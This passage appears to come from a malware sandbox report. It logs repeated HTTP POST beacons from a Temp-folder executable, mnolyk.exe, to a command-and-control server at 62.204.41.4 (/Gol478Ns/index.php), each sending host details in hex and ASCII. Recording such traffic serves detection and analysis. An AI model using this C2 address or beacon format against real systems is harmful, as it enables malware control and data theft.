                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:58.705470085 CET684INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        484192.168.2.55017462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:58.884943008 CET684OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:58.947803974 CET685INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        485192.168.2.55017562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:59.121879101 CET685OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:59.186496019 CET686INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        486192.168.2.55017662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:59.358931065 CET686OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:59.424455881 CET687INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        487192.168.2.55017762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:59.607120991 CET687OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:59.670885086 CET688INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        488192.168.2.55017862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:59.843879938 CET688OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:59.905893087 CET689INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        489192.168.2.55017962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:00.072206974 CET689OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:00.137847900 CET690INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        49192.168.2.54973962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:52.782773972 CET250OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:52.847732067 CET250INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        490192.168.2.55018062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:00.308509111 CET690OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:00.373677015 CET691INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        491192.168.2.55018162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:00.557837009 CET691OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:00.622848034 CET692INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        492192.168.2.55018262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:00.788880110 CET692OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:00.851037979 CET693INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        493192.168.2.55018362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:01.029659033 CET693OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:01.094944000 CET694INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        494192.168.2.55018462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:01.259062052 CET694OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:01.322190046 CET695INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        495192.168.2.55018562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:01.492595911 CET695OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:01.556504965 CET696INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        496192.168.2.55018662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:01.729093075 CET696OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:01.793245077 CET697INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        497192.168.2.55018762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:01.971976042 CET697OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:02.037403107 CET698INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        498192.168.2.55018862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:02.215107918 CET698OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:02.280091047 CET699INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        499192.168.2.55018962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:02.451596022 CET699OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:02.517589092 CET700INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.54969562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:29.833365917 CET205OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:29.896542072 CET206INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        50192.168.2.54974062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:53.015336037 CET251OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:53.081063986 CET251INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        500192.168.2.55019062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:02.698642015 CET700OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
